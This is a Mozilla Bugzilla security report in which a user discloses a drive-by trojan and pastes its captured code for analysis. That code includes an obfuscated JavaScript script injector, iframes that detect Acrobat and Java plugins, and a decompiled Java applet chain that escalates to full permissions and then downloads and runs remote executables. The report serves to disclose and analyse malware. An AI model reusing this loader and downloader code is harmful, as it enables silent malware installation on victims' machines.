Closed
Bug 541949
Opened 14 years ago
Closed 3 years ago
trojan.downloader.js.agent.ewo
Categories
(Firefox :: Security, defect)
Tracking
()
RESOLVED
WORKSFORME
People
(Reporter: migabriel.84, Unassigned)
References
(Blocks 1 open bug)
Details
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729) Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729) We have had problems with a trojan that is wondering freely on the internet since January 8yh and its actions are not yet completely restricted. Some websites are infected with a JavaScript code that inserts a dynamic iframe wich contains another iframe. The latter loads a Java applet. This one runs an executable file that somehow accesses the FTP passwords saved in FileZilla and perhaps other FTP clients, connects to them and posts the attached javascript code in every index and javascript file. Please analize the attached malware code that i have managed to obtain using Firebug addon on a Fedora 12 distribution. The script that can be found in the web pag. /*Exception*/ document.write('<script src='+'h)&t&!#t^p!$:))&/^$/()&##k&!!#e&@e!p#$(!v#i()d)#-!c@#)(o)@m@.)m^y(^w)^(e#&#$b#&)!s#^!#e#()#a(r!c(h!@@.)#(c$o$)m@#&#.#&$!e)@$&m#&p&@f$($l)i$^#x^^)-$()c)o)m(!&.&^(^t($r&#$u))e@^$#l$^$^i)($f^(!e)^f^!#a&^m!^&i$^l#&&@y^#@#&.!#r@#u)@^:$(8!))$0$$#8#!0!$)/(#!(n#@$!&o@^(&@v^i@n$k!y&(.$!!!@c!!@z$$&(/##$(!n$@!o(^#!&v@$!i$&(n$@@k@(y^^.(@c^$z(#/(&^((g)@&o^o$!$$g)l!e#(.)c#&$o)&^$@m@^/(z@e#d!&@#g^^e^!^.@^#@n^$e)^t$&^/^)g@o@@^o^$@@g)$l###e#@.$#c^)o$m@)@.)(p$^&e!/$$!($'.replace(/\!|\(|#|@|\^|\$|&|\)/ig, '')+' defer=defer></scr'+'ipt>'); Firs IFrame <iframe src="http://mediafire-com.ebay.it.etsy-com.yourmaxmedia.ru:8080/index.php?ys" /> <html> <head> <title>Mxn4rzu36txmtkji6fk9h5roho</title> </head> <body> <script> function Zock8gn(){ try{ Wub7r6cz = '<^&($i&@)f$#r)$!&a^(m(&(e! &(s^r&&#&c@@=#!p(^i$!&c^($s)!(/!($)C$(&!h)@&a((n!g^(&e!$L$@^o)((g(!$!.#!&p!&$d$#f$$>!)<&$@)/&$#i)f^r!(&!!a&!(m$^e@#^>#'.replace(/\$|\^|#|\!|@|\)|&|\(/ig, ''); H9102kw5 = '<^))i^&f!(!r$@#a^)m@!)e(^@ $s!#r^@^@c@@(=^&p$!i#c$(@s#/$j^a$)&v(a@.!h())t@$&m#@l$#)>((<@^/)!!$i)@$f#&r()a&@m&#@e)^&>^$!'.replace(/#|\)|@|\!|\$|&|\(|\^/ig, ''); L9z2gkl5f = 'A&(d&)o)&)^b^^e@@(@ !(A&^^c^)r(@$^!o(^(b!&a)$#^(t$'.replace(/@|#|&|\$|\(|\)|\^|\!/ig, ''); Igp2ybkx = 'A$$d$o&!)^&b($&e^&& ^P#D@&^F&#!)'.replace(/\)|\^|@|\(|\!|\$|&|#/ig, ''); for(i = 0; i < navigator.plugins.length; i++){ Htj2r5y = navigator.plugins[i].name; if((Htj2r5y.indexOf(L9z2gkl5f) != -1) || (Htj2r5y.indexOf(Igp2ybkx) != -1)){ document.write(Wub7r6cz); } } }catch(If9yxc2d){} try{ if (navigator.javaEnabled() ){ document.write(H9102kw5); } }catch(If9yxc2d){} } 25Zock8gn(); </script> </body> </html> Second IFrame <iframe src="pics/java.html" /> <html> <head> <title>Mxn4rzu36txmtkji6fk9h5roho</title> </head> <body> <applet width="300" height="300" archive="http://mediafire-com.ebay.it.etsy-com.yourmaxmedia.ru:8080/pics/JavaGame.jar" code="myf.y.AppletX" /> </body> </html> The jar file AppletX.java // Decompiled by DJ v3.11.11.95 Copyright 2009 Atanas Neshkov Date: 1/20/2010 5:05:33 PM // Home Page: http://members.fortunecity.com/neshkov/dj.html http://www.neshkov.com/dj.html - Check often for new version! // Decompiler options: packimports(3) package myf.y; import java.applet.Applet; import java.io.ByteArrayInputStream; import java.io.ObjectInputStream; // Referenced classes of package myf.y: // PayloadX, LoaderX public class AppletX extends Applet { public AppletX() { } public void init() { try { ObjectInputStream objectinputstream = new ObjectInputStream(new ByteArrayInputStream(PayloadX.StringToBytes(serializedObject))); Object obj = objectinputstream.readObject(); if(obj != null && LoaderX.instance != null) { String s = "Xeoi2a"; String s1 = getParameter("data"); String s2 = "1"; if(s1 == null) s1 = ""; LoaderX.instance.bootstrapPayload(s1, s2); } } catch(Exception exception) { } } private static final long serialVersionUID = 0xd30f41af207ff1c8L; private static final String serializedObject = "ACEDggg57372gg1B6A6176612E7574696C2E477265676F7269616E43616C656E6461728F3DD7D6E5BgDgC1g2ggg14Agg1g677265676F7269616E4375746F7665727872gg126A6176612E7574696C2E43616C656E646172E6EA4D1EC8DC5B8Eg3gggB5AgggC6172654669656C647353657449gggE66697273744461794F665765656B5Aggg9697354696D655365745Aggg76C656E69656E7449gg166D696E696D616C44617973496E46697273745765656B49ggg96E6578745374616D7g49gg1573657269616C56657273696F6E4F6E53747265616D4Aggg474696D655Bggg66669656C647374ggg25B495Bggg5697353657474ggg25B5A4Cggg47A6F6E6574gg144C6A6176612F7574696C2F54696D655A6F6E653B787gg1ggggggg1g1g1ggggggg1ggggggg2ggggggg1ggggg121563AFCgE7572ggg25B494DBA6g2676EAB2A5g2gggg787ggggggg11ggggggg1ggggg7D9ggggggg4gggggg15ggggggg4gggggg12gggggg8Aggggggg2ggggggg3ggggggg1ggggggg4gggggg1ggggggg11gggggg22ggggg2DEFE488Cgggggggggg7572ggg25B5A578F2g3914B85DE2g2gggg787ggggggg11g1g1g1g1g1g1g1g1g1g1g1g1g1g1g1g1g17372gg186A6176612E7574696C2E53696D7g6C6554696D655A6F6E65FA675D6gD15EF5A6g3gg1249gggA647374536176696E677349ggg6656E6444617949gggC656E644461794F665765656B49ggg7656E644D6F646549ggg8656E644D6F6E746849ggg7656E6454696D6549gggB656E6454696D654D6F646549ggg97261774F666673657449gg1573657269616C56657273696F6E4F6E53747265616D49ggg8737461727444617949gggE73746172744461794F665765656B49ggg973746172744D6F646549gggA73746172744D6F6E746849ggg9737461727454696D6549gggD737461727454696D654D6F646549ggg97374617274596561725AgggB7573654461796C696768745BgggB6D6F6E74684C656E67746874ggg25B427872gg126A6176612E7574696C2E54696D655A6F6E6531B3E9F57744ACA1g2ggg14Cggg2494474gg124C6A6176612F6C616E672F537472696E673B787g74gggE416D65726963612F446177736F6Egg36EE8gggggggggggggggggggggggggggggggggggggggggggggggggFE488Cggggggggg2gggggggggggggggggggggggggggggggggggggggggggggggggggggggggg7572ggg25B42ACF317F8g6g854Egg2gggg787ggggggggC1F1C1F1E1F1E1F1F1E1F1E1F77gAggggggg6gggggggggggg7571gg7Eggg6ggggggg2gggggggggggggggg787372gggD6D79662E792E4C6F61646572585E8B4C67DDC4g9D8g2gggg787g78FFFFF4E2F964ACgggA".replace('g', '0'); public static String data = null; } LoaderX.java // Decompiled by DJ v3.11.11.95 Copyright 2009 Atanas Neshkov Date: 1/20/2010 5:06:33 PM // Home Page: http://members.fortunecity.com/neshkov/dj.html http://www.neshkov.com/dj.html - Check often for new version! // Decompiler options: packimports(3) package myf.y; import java.io.*; import java.lang.reflect.Field; import java.net.URL; import java.security.*; import java.security.cert.Certificate; public class LoaderX extends ClassLoader implements Serializable { public LoaderX() { } private void writeObject(ObjectOutputStream objectoutputstream) throws IOException, ClassNotFoundException { objectoutputstream.defaultWriteObject(); } private void readObject(ObjectInputStream objectinputstream) throws IOException, ClassNotFoundException { instance = this; objectinputstream.defaultReadObject(); } public void bootstrapPayload(String s, String s1) throws IOException { Object obj = null; try { ByteArrayOutputStream bytearrayoutputstream = new ByteArrayOutputStream(); byte abyte0[] = new byte[8192]; InputStream inputstream = getClass().getResourceAsStream("/myf/y/PayloadX.class"); int i; while((i = inputstream.read(abyte0)) > 0) bytearrayoutputstream.write(abyte0, 0, i); abyte0 = bytearrayoutputstream.toByteArray(); URL url = new URL("file:///"); Certificate acertificate[] = new Certificate[0]; Permissions permissions = new Permissions(); permissions.add(new AllPermission()); ProtectionDomain protectiondomain = new ProtectionDomain(new CodeSource(url, acertificate), permissions); Class class1 = defineClass("myf.y.PayloadX", abyte0, 0, abyte0.length, protectiondomain); if(class1 != null) { Field field = class1.getField("data"); Field field1 = class1.getField("cc"); Object obj1 = class1.newInstance(); field.set(obj1, s); field1.set(obj1, s1); obj1 = class1.newInstance(); } } catch(Exception exception) { } } private static final long serialVersionUID = 0x5e8b4c67ddc409d8L; public static LoaderX instance = null; } PayloadX.java // Decompiled by DJ v3.11.11.95 Copyright 2009 Atanas Neshkov Date: 1/20/2010 5:07:09 PM // Home Page: http://members.fortunecity.com/neshkov/dj.html http://www.neshkov.com/dj.html - Check often for new version! // Decompiler options: packimports(3) package myf.y; import java.io.*; import java.net.URL; import java.security.AccessController; import java.security.PrivilegedExceptionAction; public class PayloadX implements PrivilegedExceptionAction { public static byte[] StringToBytes(String s) { byte abyte0[] = new byte[s.length() / 2]; for(int i = 0; i < s.length(); i += 2) abyte0[i / 2] = (byte)((Character.digit(s.charAt(i), 16) << 4) + Character.digit(s.charAt(i + 1), 16)); return abyte0; } public Object run() throws Exception { if(data == null) return null; try { String s = System.getProperty("os.name"); if(s.indexOf("Windows") >= 0) { int i = 1; if(cc != null) i = Integer.parseInt(cc); for(int j = 0; j < i; j++) { URL url = new URL((new StringBuilder()).append(data).append(Integer.toString(j)).toString()); url.openConnection(); InputStream inputstream = url.openStream(); String s1 = (new StringBuilder()).append(System.getProperty("java.io.tmpdir")).append(File.separator).append(Math.random()).append(".exe").toString(); FileOutputStream fileoutputstream = new FileOutputStream(s1); int k; int l; for(k = 0; (l = inputstream.read()) != -1; k++) fileoutputstream.write(l); inputstream.close(); fileoutputstream.close(); if(k >= 1024) Runtime.getRuntime().exec(s1); } } } catch(Exception exception) { } return null; } public PayloadX() { try { AccessController.doPrivileged(this); } catch(Exception exception) { } } public static String data = null; public static String cc = null; } Reproducible: Always
Reporter | ||
Updated•14 years ago
|
Summary: tojan.downloader.js.agent.ewo → trojan.downloader.js.agent.ewo
Updated•14 years ago
|
Blocks: malware-attacks
Updated•14 years ago
|
Group: core-security
Updated•13 years ago
|
Version: unspecified → 3.6 Branch
Comment 1•12 years ago
|
||
What should we do with this report ? There is nothing that we can do with it.
Comment 2•3 years ago
|
||
Hey Matti,
Are you by any chance able to reproduce this issue or should we close it?
Flags: needinfo?(bugzilla)
Comment 3•3 years ago
|
||
I don't think that this report is still useful after all this years.
The LoaderX.java part is also not working anymore since Mozilla stopped supporting the Java plugin.
Status: UNCONFIRMED → RESOLVED
Closed: 3 years ago
Flags: needinfo?(bugzilla)
Resolution: --- → WORKSFORME
You need to log in
before you can comment on or make changes to this bug.
Description
•